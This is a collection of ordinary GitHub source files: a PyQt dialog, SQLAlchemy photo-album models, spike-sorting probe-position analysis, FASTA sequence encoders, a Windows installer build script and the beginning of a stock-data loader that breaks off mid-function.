preset_save_action.triggered.connect(lambda: self.run_action(self.save_state, None, True))\n\n def populate_qss_styles(self):\n try:\n self.themes_menu.clear()\n except (RuntimeError, AttributeError):\n self.themes_menu = self.menu_bar.addMenu('Themes')\n\n for qss_style in glob(os.path.join(utils.RESOURCES_PATH, self.QSS_GLOB)):\n file_name = os.path.basename(qss_style)\n style_name = os.path.splitext(file_name)[0]\n\n if file_name not in [self.DARK_TEXT_QSS, self.LIGHT_TEXT_QSS]:\n action_name = style_name.capitalize() if not style_name == 'default' else 'native OS'\n menu_action = self.themes_menu.addAction(action_name)\n menu_action.triggered.connect(\n partial(self.run_action, self.load_stylesheet, None, stylesheet=file_name))\n\n @utils.cache_function\n def get_stylesheet_qss(self, stylesheet):\n file_path = os.path.join(utils.RESOURCES_PATH, stylesheet)\n stylesheet_file = os.path.normpath(file_path)\n return open(stylesheet_file).read() if os.path.isfile(stylesheet_file) else ''\n\n def load_stylesheet(self, btn_event=None, stylesheet=''):\n 
self.dark.set('dark' in stylesheet)\n qss_data = self.get_stylesheet_qss(stylesheet=stylesheet)\n self.current_stylesheet = qss_data\n self.update_stylesheet.emit()\n\n def set_stylesheet(self):\n self.setStyleSheet(self.combined_stylesheet())\n\n @staticmethod\n def add_fonts():\n for font_file in [os.path.join(utils.FONTS_PATH, path) for path in os.listdir(utils.FONTS_PATH)]:\n QtGui.QFontDatabase.addApplicationFont(font_file)\n\n def next_stack_frame(self, *args):\n current_index = self.wgt_stack.currentIndex()\n next_index = current_index + 1\n if next_index + 1 > self.wgt_stack.count():\n next_index = 0\n self.wgt_stack.setCurrentIndex(next_index)\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasUrls:\n event.accept()\n self.wgt_stack.setCurrentIndex(1)\n else:\n event.ignore()\n\n def dragLeaveEvent(self, event):\n event.accept()\n self.wgt_stack.setCurrentIndex(0)\n\n def dropEvent(self, event):\n if event.mimeData().hasUrls():\n event.setDropAction(QtCore.Qt.CopyAction)\n event.accept()\n self.dropped_files.emit([str(url.toLocalFile()) for url in event.mimeData().urls()])\n\n if utils.get_application_type() == 'Maya':\n if event.mimeData().hasText():\n self.dropped_files.emit(event.mimeData().text().split())\n\n def keyPressEvent(self, QKeyPressEvent):\n # Attempting to use this passthrough fix to prevent taking over maya shortcuts:\n # https://forums.autodesk.com/t5/maya-programming/maya-amp-pyqt-how-to-prevent-trigger-of-shortcut-keys/td-p/4354371\n pass\n\n def mousePressEvent(self, event):\n focused_widget = self.focused_widget\n if isinstance(focused_widget, QtWidgets.QLineEdit):\n focused_widget.clearFocus()\n super(MainDialog, self).mousePressEvent(event)\n\n def close(self, save_state=True):\n try:\n QtWidgets.QApplication.instance().removeEventFilter(self)\n except RuntimeError:\n self.LOG.warning('Failed to remove event filter...')\n\n if save_state:\n self.save_state(quit_mode=True)\n\n platforms.current.close(self)\n\n def closeEvent(self, e):\n self.close()\n super(MainDialog, self).closeEvent(e)\n","repo_name":"AndresMWeber/NomenclateUI","sub_path":"nomenclateUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5253003936","text":"from sqlalchemy import Column, String, Integer, Boolean, DateTime\nfrom datetime import datetime\nfrom app import db\n\n\"\"\"\ndb_drop_and_create_all()\n drops the database tables and starts fresh\n can be used to initialize a clean database\n\"\"\"\n\n\ndef db_reset():\n db.drop_all()\n db.create_all()\n\n\ndef setup_db(app, database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n\n\nclass Album(db.Model):\n id = Column(Integer, primary_key=True)\n name = Column(String(50), index=True, nullable=False)\n url = Column(String(500), nullable=False)\n timestamp = Column(DateTime, index=True, default=datetime.utcnow)\n user_id = Column(String(50))\n last_time_viewed = Column(DateTime, default=datetime.utcnow)\n last_photo_viewed = Column(String(300))\n images = db.relationship(\"Image\", backref=\"album\", lazy=\"dynamic\")\n\n def __repr__(self):\n return \"\".format(\n self.name,\n self.url,\n self.user_id,\n self.last_time_viewed,\n self.last_photo_viewed,\n )\n\n def __init__(self, name, url, user_id=\"ANON\"):\n self.name = name\n self.url = url\n self.user_id = 
user_id\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"url\": self.url,\n \"timestamp\": self.timestamp,\n \"user_id\": self.user_id,\n \"images\": self.images,\n }\n\n\nclass Image(db.Model):\n id = Column(Integer, primary_key=True)\n url = Column(String(300), nullable=False)\n timestamp = Column(DateTime, index=True, default=datetime.utcnow)\n viewed = Column(Boolean)\n album_id = Column(Integer, db.ForeignKey(\"album.id\"), nullable=False)\n\n def __repr__(self):\n return \"\".format(self.album_id, self.url, self.viewed)\n\n def __init__(self, url, album_id, viewed=False):\n self.url = url\n self.album_id = album_id\n self.viewed = viewed\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n \"id\": self.id,\n \"url\": self.url,\n \"timestamp\": self.timestamp,\n \"album_id\": self.album_id,\n \"viewed\": self.viewed,\n }\n","repo_name":"MattiooFR/1pic1day","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"738465835","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom spikesorting_tsne.spikesorting_tsne import constants as ct\nimport pandas as pd\n\n\ndef _get_relevant_channels_with_threshold(threshold, template):\n amplitude = np.nanmax(template) - np.nanmin(template)\n points_over_threshold = np.argwhere(template > (np.nanmax(template) - threshold * amplitude))\n channels_over_threshold = np.unique(points_over_threshold[:, 1])\n return channels_over_threshold\n\n\ndef _get_relevant_channels_over_median_peaks(threshold, template):\n median = np.median(np.nanmin(template, axis=0))\n std = np.std(np.nanmin(template, axis=0))\n points_under_median = np.argwhere(template < (median - threshold*std))\n channels_over_threshold = np.unique(points_under_median[:, 1])\n return channels_over_threshold\n\n\ndef _normalize(L, normalizeFrom=0, normalizeTo=1):\n '''normalize values of a list to make its min = normalizeFrom and its max = normalizeTo'''\n vMax = max(L)\n vMin = min(L)\n return [(x-vMin)*(normalizeTo - normalizeFrom) / (vMax - vMin) for x in L]\n# ------------------\n\n\ndef generate_probe_positions_of_spikes(base_folder, binary_data_filename, number_of_channels_in_binary_file,\n used_spikes_indices=None, position_mult=2.25, threshold=0.1):\n \"\"\"\n Generate positions (x, y coordinates) for each spike on the probe. This function assumes that the spikes were\n generated with the kilosort algorithm so the base_folder holds all the necessary .npy arrays.\n In order for this function to find which channels are the most relevant in each spike it looks into the spike's\n assigned template (a channels x time points array in spike_templates.npy). It then find the minimum points of all\n channels, takes their median and their standard deviation and for each channel creates the difference between the\n minimum and the median. 
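    [Editor's aside] A tiny self-contained illustration of the channel
    demarcation rule described here, using the module's own
    _get_relevant_channels_over_median_peaks; all numbers are toy values
    assumed purely for illustration:

        import numpy as np
        template = np.zeros((10, 4))   # 10 time points x 4 channels
        template[5, 1] = -80.0         # channel 1: deep trough
        template[5, 2] = -60.0         # channel 2: shallower trough
        # per-channel minima [0, -80, -60, 0] -> median -30, std ~ 35.7
        # channels dipping below median - 0.5*std (~ -47.9) survive:
        # _get_relevant_channels_over_median_peaks(0.5, template) -> [1, 2]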
Finally it demarcates the relevant to the template channels by keeping the ones whose\n difference is larger than a number of times (threshold) over the standard deviation.\n It then picks the relevant channels of the spike's raw data, finds the differences between the minimum value\n and the channel's time series median value (over time), orders the channels according to these differences and\n assigns weights between 0 and 1 (0 for a difference of 0, 1 for a maximum difference).\n It finally finds the x, y positions of the selected channels and adds to the position of the largest difference\n channel the weighted average positions of the remaining selected channels\n\n :param base_folder: the folder name into which the kilosort result .npy arrays are\n :type base_folder: string\n :param binary_data_filename: the name of the binary file that holds the raw data that were originally passed to kilosort\n :type binary_data_filename: string\n :param number_of_channels_in_binary_file: How many channels does the binary file have (this is different to the number\n of channels that are set to active in kilosort)\n :type number_of_channels_in_binary_file: int\n :param used_spikes_indices: which of the spikes found by kilosort should be considered.\n :type used_spikes_indices: int[:]\n :param threshold: the number of times the standard deviation should be larger than the difference between a\n channel's minimum and the median of the minima of all channels in order to demarcate the channel as\n relevant to the spike\n\n :type threshold: float\n :return: The position of each spike on the probe, the distance of eac h spike on the probe from the 0, 0 of the\n probe, the indices of the original ordering of the spikes on the new order sorted according to their distance on\n the probe, the distance of each spike on the probe sorted\n :rtype: float32[len(used_spike_indices), 2], float32[len(used_spike_indices)], int[len(used_spike_indices)], float32[len(used_spike_indices)]\n\n \"\"\"\n # Load the required data from the kilosort folder\n channel_map = np.load(os.path.join(base_folder, 'channel_map.npy'))\n active_channel_map = np.squeeze(channel_map, axis=1)\n channel_positions = np.load(os.path.join(base_folder, 'channel_positions.npy'))\n\n spike_templates = np.load(os.path.join(base_folder, ct.SPIKE_TEMPLATES_FILENAME))\n templates = np.load(os.path.join(base_folder, ct.TEMPLATES_FILENAME))\n\n data_raw = np.memmap(os.path.join(base_folder, binary_data_filename),\n dtype=np.int16, mode='r')\n\n number_of_timepoints_in_raw = int(data_raw.shape[0] / number_of_channels_in_binary_file)\n data_raw_kilosorted = np.reshape(data_raw, (number_of_channels_in_binary_file, number_of_timepoints_in_raw), order='F')\n\n spike_times = np.squeeze(np.load(os.path.join(base_folder, ct.SPIKE_TIMES_FILENAME)).astype(np.int))\n\n time_points = 50\n if used_spikes_indices is None:\n used_spikes_indices = np.arange(0, len(spike_times))\n\n # Run the loop over all spikes to get the positions\n counter = 0\n weighted_average_postions = np.empty((len(used_spikes_indices), 2))\n spike_distance_on_probe = np.empty(len(used_spikes_indices))\n for spike_index in np.arange(0, len(used_spikes_indices)):\n spike_raw_data = data_raw_kilosorted[active_channel_map,\n (spike_times[used_spikes_indices[spike_index]]-time_points):\n (spike_times[used_spikes_indices[spike_index]]+time_points)]\n template = templates[spike_templates[used_spikes_indices[spike_index]], :, :].squeeze()\n relevant_channels = 
_get_relevant_channels_over_median_peaks(threshold, template)\n\n spike_raw_data_median_over_time = np.median(spike_raw_data, axis=1)\n peaks_to_median = spike_raw_data_median_over_time - spike_raw_data.min(axis=1)\n peaks_to_median = peaks_to_median[relevant_channels]\n\n relevant_channels_sorted = [v for (k, v) in sorted(zip(peaks_to_median, relevant_channels), reverse=True)]\n\n peaks_to_median_sorted = sorted(peaks_to_median, reverse=True)\n peaks_to_median_sorted.append(np.median(spike_raw_data_median_over_time[relevant_channels]))\n\n weights = _normalize(peaks_to_median_sorted)[:-1]\n relevant_channels_positions = channel_positions[relevant_channels_sorted]\n\n pos_x = relevant_channels_positions[0, 0]\n pos_y = relevant_channels_positions[0, 1]\n\n new_pos_x = pos_x - np.mean(((pos_x - relevant_channels_positions[:, 0]) * weights)[1:])\n new_pos_y = pos_y - np.mean(((pos_y - relevant_channels_positions[:, 1]) * weights)[1:])\n weighted_average_postions[spike_index, :] = [new_pos_x, new_pos_y]\n spike_distance_on_probe[spike_index] = np.sqrt(np.power(new_pos_x, 2) + np.power(new_pos_y, 2))\n\n counter += 1\n if counter % 5000 == 0:\n print('Completed ' + str(counter) + ' spikes')\n weighted_average_postions = weighted_average_postions * position_mult\n\n # sort according to position on probe\n spike_indices_sorted_by_probe_distance = np.array([b[0] for b in sorted(enumerate(spike_distance_on_probe),\n key=lambda dist: dist[1])])\n spike_distances_on_probe_sorted = np.array([b[1] for b in sorted(enumerate(spike_distance_on_probe),\n key=lambda dist: dist[1])])\n\n np.save(os.path.join(base_folder, ct.WEIGHTED_SPIKE_POSITIONS_FILENAME), weighted_average_postions)\n\n return weighted_average_postions, spike_distance_on_probe, \\\n spike_indices_sorted_by_probe_distance, spike_distances_on_probe_sorted\n\n\ndef generate_probe_positions_of_templates(base_folder, threshold=0.1, new_templates_array=None):\n \"\"\"\n Generate positions (x, y coordinates) for each template found by kilosort on the probe or passed to it by the\n new_templates_array.\n This function assumes that the base_folder holds all the necessary .npy arrays.\n\n If no new_templates_array is passed it will look for the templates.npy file (created by kilosort) which is the\n average of all spikes for each template (so a (templates x time x channels) data cube). It will also try to find the\n file template_marking.npy which is produced after cleaning using the spikesort_tsne_guis.clean_kilosort_templates\n GUI. If this is found only the non noise templates will have their position evaluated. If not found all templates\n will be considered.\n\n If a new_templates_array is passed (a data cube of either (templates x time x channels) or (templates x channels x time)\n dimensions) then this will be used to calculate the positions.\n\n In order for this function to find which channels are the most relevant in each template it looks into the\n template (a (channels x time) array). It then find the minimum points of all\n channels, takes their median and their standard deviation and for each channel creates the difference between the\n minimum and the median. 
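    [Editor's aside] The weighted averaging of channel positions described
    here, reduced to one axis with toy numbers assumed purely for
    illustration (weights come from _normalize, strongest channel first
    with weight 1.0):

        import numpy as np
        pos_x = 20.0                               # strongest channel
        channel_xs = np.array([20.0, 0.0, 40.0])   # sorted by peak size
        weights = np.array([1.0, 0.5, 0.25])
        new_pos_x = pos_x - np.mean(((pos_x - channel_xs) * weights)[1:])
        # (20-0)*0.5 = 10, (20-40)*0.25 = -5 -> mean 2.5 -> new_pos_x 17.5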
Finally it demarcates the relevant to the template channels by keeping the ones whose\n difference is larger than a number of times (threshold) over the standard deviation.\n It then picks the relevant channels of the spike's raw data, finds the differences between the minimum value\n and the channel's time series median value (over time), orders the channels according to these differences and\n assigns weights between 0 and 1 (0 for a difference of 0, 1 for a maximum difference).\n It finally finds the x, y positions of the selected channels and adds to the position of the largest difference\n channel the weighted average positions of the remaining selected channels\n\n :param base_folder: the folder name into which the kilosort result .npy arrays are\n :type base_folder: string\n :param threshold: the number of times the standard deviation should be larger than the difference between a\n channel's minimum and the median of the minima of all channels in order to demarcate the channel asvrelevant to the\n spike\n\n :type threshold: float\n :param new_templates_array: an array that is the average over spikes of all templates\n :type new_templates_array: float32[templates x channels x time]\n :return: weighted_average_postions : the positions of the templates on the probe\n :rtype: weighted_average_postions : float32[len(used_spike_indices) x 2]\n\n \"\"\"\n # Load the required data from the kilosort folder\n channel_positions = np.load(os.path.join(base_folder, 'channel_positions.npy'))\n if new_templates_array is None:\n try:\n templates = np.load(os.path.join(base_folder, ct.TEMPLATES_FILENAME))\n except FileNotFoundError:\n exit('No new_templates_array passed and no templates.npy found in folder')\n try:\n template_markings = np.load(os.path.join(base_folder, ct.TEMPLATE_MARKING_FILENAME))\n except FileNotFoundError:\n template_markings = np.ones((len(templates)))\n templates = templates[template_markings > 0, :, :]\n\n else:\n if new_templates_array.shape[1] > new_templates_array.shape[2]:\n templates = np.reshape(new_templates_array, (new_templates_array.shape[0],\n new_templates_array.shape[2],\n new_templates_array.shape[1]))\n else:\n templates = new_templates_array\n\n # Run the loop over all templates to get the positions\n counter = 0\n templates_positions = []\n for template in templates:\n relevant_channels = _get_relevant_channels_over_median_peaks(threshold, template)\n\n template_median_over_time = np.median(template, axis=0)\n peaks_to_median = template_median_over_time - template.min(axis=0)\n peaks_to_median = peaks_to_median[relevant_channels]\n\n relevant_channels_sorted = [v for (k, v) in sorted(zip(peaks_to_median, relevant_channels), reverse=True)]\n\n peaks_to_median_sorted = sorted(peaks_to_median, reverse=True)\n peaks_to_median_sorted.append(np.median(template_median_over_time[relevant_channels]))\n\n weights = _normalize(peaks_to_median_sorted)[:-1]\n relevant_channels_positions = channel_positions[relevant_channels_sorted]\n\n pos_x = relevant_channels_positions[0, 0]\n pos_y = relevant_channels_positions[0, 1]\n\n new_pos_x = pos_x - np.mean(((pos_x - relevant_channels_positions[:, 0]) * weights)[1:])\n new_pos_y = pos_y - np.mean(((pos_y - relevant_channels_positions[:, 1]) * weights)[1:])\n templates_positions.append([new_pos_x, new_pos_y])\n counter += 1\n if not (counter % 100):\n print('Completed ' + str(counter) + ' templates')\n\n templates_positions = np.array(templates_positions)\n\n np.save(os.path.join(base_folder, 
ct.WEIGHTED_TEMPLATE_POSITIONS_FILENAME), templates_positions)\n\n return np.array(templates_positions)\n\n\ndef get_y_spread_regions_of_bad_channel_groups(base_folder, bad_channel_groups):\n\n channel_positions = np.load(os.path.join(base_folder, 'channel_positions.npy'))\n bad_channel_groups_y_spreads = []\n for bc_group in bad_channel_groups:\n bc_positions = channel_positions[bc_group]\n top = bc_positions[:, 1].max()\n bottom = bc_positions[:, 1].min()\n bad_channel_groups_y_spreads.append([bottom, top])\n\n return bad_channel_groups_y_spreads\n\n\ndef view_spike_positions(spike_positions, brain_regions, probe_dimensions, labels_offset=80, font_size=20):\n \"\"\"\n Plot the spike positions as a scatter plot on a probe marked with brain regions\n\n :param spike_positions: the x,y positions of the spikes\n :type spike_positions: (np.array((N,2)))\n :param brain_regions: a dictionary with keys the names of the brain regions underneath the demarcating lines and\n values the y position on the probe of the demarcating lines\n\n :type brain_regions: dict\n :param probe_dimensions: the x and y limits of the probe\n :type probe_dimensions: (np.array(2))\n\n \"\"\"\n\n fig = plt.figure()\n ax = fig.add_axes([0.08, 0.05, 0.9, 0.9])\n ax.scatter(spike_positions[:, 0], spike_positions[:, 1], s=5)\n ax.set_xlim(0, probe_dimensions[0])\n ax.set_ylim(0, probe_dimensions[1])\n ax.yaxis.set_ticks(np.arange(0, probe_dimensions[1], 100))\n ax.tick_params(axis='y', direction='in', length=5, width=1, colors='b')\n for region in brain_regions:\n ax.text(2, brain_regions[region] - labels_offset, region, fontsize=font_size)\n ax.plot([0, probe_dimensions[0]], [brain_regions[region], brain_regions[region]], 'k--', linewidth=2)\n return fig, ax\n\n\ndef view_grouped_templates_positions(base_folder, brain_regions, probe_dimensions, position_multiplier=1,\n bad_channel_regions=None, template_info=None, labels_offset=80,\n font_size=20, dot_sizes=None,\n func_to_run_on_click=None, args_of_func=None):\n \"\"\"\n\n :param base_folder: the folder where all the npy arrays (template_markings etc.) are saved\n :type base_folder: string\n :param brain_regions: a dictionary with keys the names of the brain regions underneath the demarcating lines and\n values the y position on the probe of the demarcating lines\n :param probe_dimensions: the dimensions of the probe\n :type probe_dimensions: np.array(2)\n :type brain_regions: (dict{string: float})\n :param position_multiplier: a number multiplying the positions so that the numbers are not the arbitrary ones from\n the prb file but correspond to the length of the probe\n\n :type position_multiplier: float\n :param template_info: If provided the template_info will be used to define the types of the templates. It assumes\n the length of the template_info and of the loaded weighted_template_positions array is the same unless the\n template_info has template positions (position X and position Y column) in it. In this case these are used. Also\n the template_info is used to know which template is clicked on the figure for the on_pick event\n\n :type template_info: pd.Dataframe\n :param labels_offset: offset of the labels on the plot\n :type labels_offset: (int)\n :param font_size: the font size of the labels\n :type font_size: (int)\n :param func_to_run_on_click: The function to run on a click of a scatter point. 
It assumes that the first argument\n it needs is the template row of the template_info that was click.\n :type func_to_run_on_click: Func\n :param args_of_func: The arguments of the function to run on on_pick (after the template itself)\n :type args_of_func: list of objects\n :return:\n \"\"\"\n\n template_positions = np.squeeze(\n position_multiplier * np.load(os.path.join(base_folder, ct.TEMPLATE_POSITIONS_FILENAME)))\n\n if template_info is None:\n template_markings = np.load(os.path.join(base_folder, ct.TEMPLATE_MARKING_FILENAME))\n clean_template_markings = np.squeeze(template_markings[np.argwhere(template_markings > 0)])\n else:\n clean_template_markings = np.empty((len(template_info)))\n for t in ct.types:\n clean_template_markings[template_info['type'] == ct.types[t]] = t\n if ~np.isnan(template_info.iloc[0]['position X']):\n template_positions = template_info[['position X', 'position Y']].values * position_multiplier\n\n def on_pick(event):\n xmouse, ymouse = event.mouseevent.xdata, event.mouseevent.ydata\n ind = event.ind[0]\n x = template_positions[ind, 0]\n y = template_positions[ind, 1]\n print('________________________')\n print('x, y of mouse: {:.2f},{:.2f}'.format(xmouse, ymouse))\n print('Position: {}, {}'.format(str(x), str(y)))\n print('------------------------')\n if template_info is not None:\n template_number = template_info.iloc[ind]['template number']\n print('Template number = {}'.format(template_number))\n print('Firing frequency = {}'.format(template_info.iloc[ind]['firing rate']))\n print('Number of spikes = {}'.format(template_info.iloc[ind]['number of spikes']))\n print('________________________')\n if func_to_run_on_click is not None:\n if args_of_func is None:\n func_to_run_on_click(template_info.iloc[ind])\n else:\n func_to_run_on_click(template_info.iloc[ind], *args_of_func)\n\n types = np.flipud(np.unique(clean_template_markings))\n fig = plt.figure()\n ax = fig.add_axes([0.08, 0.05, 0.9, 0.9])\n fig.canvas.callbacks.connect('pick_event', on_pick)\n\n tolerance = 1\n cm = plt.cm.cool\n\n type_to_color = {1: (0, 61/255, 1, 1), 2: (27/255, 221/255, 206/255, 1), 3: (99/255, 214/255, 39/255, 1),\n 4: (255/255, 183/255, 0/255, 1), 5: (100/255, 100/255, 100/255, 1),\n 6: (170 / 255, 170 / 255, 170 / 255, 1), 7: (240/255, 240/255, 240/255, 1)}\n type_to_size = {1: 60, 2: 50, 3: 40, 4: 40, 5: 40, 6: 40, 7: 40}\n\n colors = np.array(len(template_positions) * [(0, 0, 0, 1)]).astype(float)\n sizes = np.array(len(template_positions) * [40.0])\n\n for type in types:\n indices_of_templates_of_type = np.squeeze(np.argwhere(clean_template_markings == type)).astype(np.int)\n if np.size(indices_of_templates_of_type) < 2:\n colors[indices_of_templates_of_type] = type_to_color[type]\n else:\n colors[indices_of_templates_of_type] = [type_to_color[type]]\n if dot_sizes is None:\n sizes[indices_of_templates_of_type] = type_to_size[type]\n\n if dot_sizes is not None:\n sizes = dot_sizes\n\n ax.scatter(template_positions[:, 0], template_positions[:, 1], s=sizes, c=colors,\n picker=tolerance)\n\n ax.set_xlim(0, probe_dimensions[0])\n ax.set_ylim(0, probe_dimensions[1])\n ax.yaxis.set_ticks(np.arange(0, probe_dimensions[1], 100))\n ax.tick_params(axis='y', direction='in', length=5, width=1, colors='b')\n\n if bad_channel_regions is not None:\n for bc_region in bad_channel_regions:\n bc_region = np.array(bc_region) * position_multiplier\n ax.add_patch(Rectangle((0, bc_region[0]),\n 100, bc_region[1] - bc_region[0],\n facecolor=\"grey\", alpha=0.5))\n\n for region in brain_regions:\n 
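# ---------------------------------------------------------------------
# [Editor's aside] A sketch of wiring a click handler through
# func_to_run_on_click / args_of_func as documented above; the handler
# name and the extra `session` argument are hypothetical, invented only
# for illustration:
#
#     def on_template_clicked(template_row, session):
#         print('clicked template', template_row['template number'])
#
#     view_grouped_templates_positions(base_folder, brain_regions,
#                                      probe_dimensions,
#                                      template_info=template_info,
#                                      func_to_run_on_click=on_template_clicked,
#                                      args_of_func=[session])
# ---------------------------------------------------------------------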
ax.text(2, brain_regions[region] - labels_offset, region, fontsize=font_size)\n ax.plot([0, probe_dimensions[0]], [brain_regions[region], brain_regions[region]], 'k--', linewidth=2)\n\n return fig, ax\n","repo_name":"georgedimitriadis/themeaningofbrain","sub_path":"BrainDataAnalysis/Spike_Sorting/positions_on_probe.py","file_name":"positions_on_probe.py","file_ext":"py","file_size_in_byte":20830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70132328516","text":"def create_seqs_dict(fasta):\n \"\"\"\n From a fasta file, the function builds a dictionary {label:sequence}.\n In fasta format, the even # lines are labels that start with \">\",\n the odd # lines are sequences.\n \"\"\"\n seqs = {}\n with open(fasta, \"r\") as f:\n last_label = \"\"\n for line, text in enumerate(f):\n if line % 2 == 0: # is label\n # Create new entry in dictionary for upcoming sequence\n seqs[text.strip()[1:]] = \"\"\n last_label = text.strip()[1:]\n else:\n # Add sequence to newly created entry\n seqs[last_label] = text.strip()\n return seqs\n\n\ndef create_seqs_matrix(seqs, SEQ_LEN):\n \"\"\"\n ONE-HOT ENCODING\n seqs is a dict mapping id:sequence\n return N x M x 5 tensor where each row is a M x 5 one-hot encoding of an M-length sequence\n \"\"\"\n seqs_m = np.zeros(shape=(len(seqs), SEQ_LEN, 5))\n seqs_index = {}\n # for i, seq_id in enumerate(tqdm(seqs)):\n for i, seq_id in enumerate(seqs):\n seqs_index[seq_id] = i\n for j, nucl in enumerate(seqs[seq_id]):\n if nucl == \"A\":\n seqs_m[i][j][0] = 1\n elif nucl == \"C\":\n seqs_m[i][j][1] = 1\n elif nucl == \"T\":\n seqs_m[i][j][2] = 1\n elif nucl == \"G\":\n seqs_m[i][j][3] = 1\n else:\n assert nucl == \"-\" or nucl == \"N\", f\"nucl: {nucl}\"\n seqs_m[i][j][4] = 1\n return seqs_m, seqs_index\n\n\ndef create_seqs_matrix_numerical(seqs, SEQ_LEN):\n \"\"\"\n seqs is a dict mapping id:sequence\n return index dictionary and an N x M matrix where each row encodes a sequence as {A,C, T, G, -} -> {0, 1, 2, 3, 4}\n \"\"\"\n seqs_m = np.zeros(shape=(len(seqs), SEQ_LEN))\n seqs_index = {}\n # for i, seq_id in enumerate(tqdm(seqs)):\n for i, seq_id in enumerate(seqs):\n seqs_index[seq_id] = i\n for j, nucl in enumerate(seqs[seq_id]):\n if nucl == \"A\":\n seqs_m[i][j] = 0\n elif nucl == \"C\":\n seqs_m[i][j] = 1\n elif nucl == \"T\":\n seqs_m[i][j] = 2\n elif nucl == \"G\":\n seqs_m[i][j] = 3\n else:\n assert nucl == \"-\" or nucl == \"N\"\n seqs_m[i][j] = 4\n return seqs_m, seqs_index","repo_name":"dannovikov/mcem","sub_path":"utils/seq_utils.py","file_name":"seq_utils.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72655282434","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis script has to be run from the main dir e.g. 
D:\\GitHub\\StructureFinder\n\"\"\"\nimport hashlib\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\napp_path = str(Path(__file__).resolve().parent.parent)\nmain_path = str(Path(__file__).resolve().parent)\npathadd = [app_path, main_path, str(Path(app_path) / 'src')]\nsys.path.extend(pathadd)\n\nimport subprocess\n\n# noinspection PyUnresolvedReferences\nfrom PyQt5 import uic\n\nfrom scripts.version_numbers import disable_debug, pypath\nfrom structurefinder.misc.version import VERSION\n\nprint(\"Updating version numbers to version {} ...\".format(VERSION))\n\n# disable all debug variables:\nfor i in pypath:\n disable_debug(i)\n\nprint(\"Version numbers updated.\")\n\ntry:\n print(os.path.abspath('./src/structurefinder/gui'))\n uic.compileUiDir('./src/structurefinder/gui')\n print('recompiled ui')\nexcept:\n print(\"Unable to compile UI!\")\n raise\n\n\ndef sha512_checksum(filename, block_size=65536):\n \"\"\"\n Calculates a SHA512 checksum from a file.\n \"\"\"\n sha512 = hashlib.sha512()\n with open(filename, 'rb') as f:\n for block in iter(lambda: f.read(block_size), b''):\n sha512.update(block)\n return sha512.hexdigest()\n\n\ndef make_shasum(filename):\n sha = sha512_checksum(filename)\n shafile = Path('scripts/Output/StructureFinder-setup-x64-v{}-sha512.sha'.format(VERSION))\n shafile.unlink(missing_ok=True)\n shafile.write_text(sha)\n print(\"SHA512: {}\".format(sha))\n\n\ndef make_installer():\n innosetup_compiler = r'D:\\Programme\\Inno Setup 6/ISCC.exe'\n innosetup_compiler2 = r'C:\\Program Files (x86)\\Inno Setup 6/ISCC.exe'\n if not Path(innosetup_compiler).exists():\n innosetup_compiler = innosetup_compiler2\n subprocess.run([innosetup_compiler, '/Qp', f'/dMyAppVersion={VERSION}', r'scripts\\strf-install_win64.iss', ])\n\n\ndef compile_python_files():\n import compileall\n compileall.compile_dir(dir='dist', workers=2, force=True)\n compileall.compile_dir(dir='src', workers=2, force=True)\n\n\nif __name__ == '__main__':\n # Make binary distributions:\n make_installer()\n\n make_shasum(\"scripts/Output/StructureFinder-setup-x64-v{}.exe\".format(VERSION))\n\n print('\\nCreated version: {}'.format(VERSION))\n print(datetime.now().strftime(\"%d.%m.%Y %H:%M:%S\"))\n\n subprocess.call(\"scripts/Output/StructureFinder-setup-x64-v{}.exe\".format(VERSION))\n","repo_name":"dkratzert/StructureFinder","sub_path":"scripts/make_win_release.py","file_name":"make_win_release.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"24041276719","text":"# -*- coding: utf-8 -*-\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Spliting dataset into training and testing sets\nfrom sklearn.model_selection import train_test_split as sklearn_train_test_split\n\nfrom keras.callbacks import Callback\n\n\nclass SavePredictionCallback(Callback):\n counter = 0\n\n def __init__(self, predicted_prefix, X_train):\n self.predicted_prefix = predicted_prefix\n self.X_train = X_train\n\n def on_epoch_end(self, epoch, logs={}):\n self.model.reset_states()\n return\n\n\ndef load_csv(filepath, stock_id=None):\n \"\"\"\n Load a dataset from csv file.\n Arguments:\n filepath: Relative or absolute file path to the historical stock price in csv format.\n Returns:\n Full historical stock prices as a Dataframe\n \"\"\"\n print('historical data is loading from {}'.format(filepath))\n try:\n df = pd.read_csv(filepath, 
